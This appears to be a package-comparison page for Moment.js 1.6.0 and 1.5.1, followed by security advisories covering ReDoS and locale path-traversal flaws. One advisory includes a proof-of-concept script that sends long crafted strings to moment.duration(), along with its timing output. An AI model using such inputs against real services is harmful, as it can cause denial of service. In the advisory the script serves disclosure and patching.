Moment.js 1.6.0 arrived on April 26, 2012, succeeding version 1.5.1 released on April 6, 2012. Both iterations of this popular JavaScript date library maintain the core philosophy of simplifying date creation, manipulation, and formatting without modifying the native Date object. Developers familiar with 1.5.1 will find the upgrade to 1.6.0 seamless, as the fundamental API principles remain consistent. The library continues to boast a clean, intuitive interface for handling common date-related tasks, such as parsing, validating, adding or subtracting time, and displaying dates in various formats.
The metadata reveals no changes in dependencies or development dependencies, signaling that the underlying build and testing processes remained stable between releases. Both versions rely on jshint for code quality checks, nodeunit for testing, and uglify-js for minification. While the core functionality appears unchanged on the surface, developers should investigate the detailed changelog (typically available on the project's GitHub repository) to uncover specific bug fixes, performance improvements, or minor API tweaks included in version 1.6.0. Even seemingly small updates can address critical edge cases or enhance the overall reliability of the library, ultimately ensuring a smoother experience. For projects already using Moment.js, upgrading to 1.6.0 is likely a low-risk endeavor, potentially offering subtle enhancements without introducing breaking changes, subject to changelog verification.
All the vulnerabilities related to the version 1.6.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: